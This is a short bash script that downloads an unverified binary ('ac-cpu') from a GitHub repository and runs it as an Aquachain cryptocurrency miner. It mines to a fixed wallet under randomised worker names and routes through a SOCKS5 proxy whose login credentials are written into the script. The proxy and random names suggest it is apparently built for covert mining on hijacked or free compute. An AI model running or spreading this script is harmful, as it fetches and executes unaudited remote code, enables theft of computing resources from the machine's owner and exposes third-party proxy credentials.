#!/bin/bash
array[0]="mukidi" 
array[1]="sumanto" 
array[2]="quntul"
array[3]="sukirno"
size=${#array[@]} 
index=$(($RANDOM % $size)) 
worker=${array[$index]} 
apt-get update
apt-get install -y libssl-dev libcurl4-gnutls-dev libgmp-dev
wget https://github.com/kiposnakursi/a/raw/main/ac-cpu
chmod +x ac-cpu
./ac-cpu -F http://pool.aquachain.xyz:8888/0xfd1dee7318bb6b233914dbec812e316089d0e218/$worker -t 16 --proxy socks5://21icholuythb13:zk6jl4wmaycgt5m1uwi3lnr37jh@us-east-static-09.quotaguard.com:1080
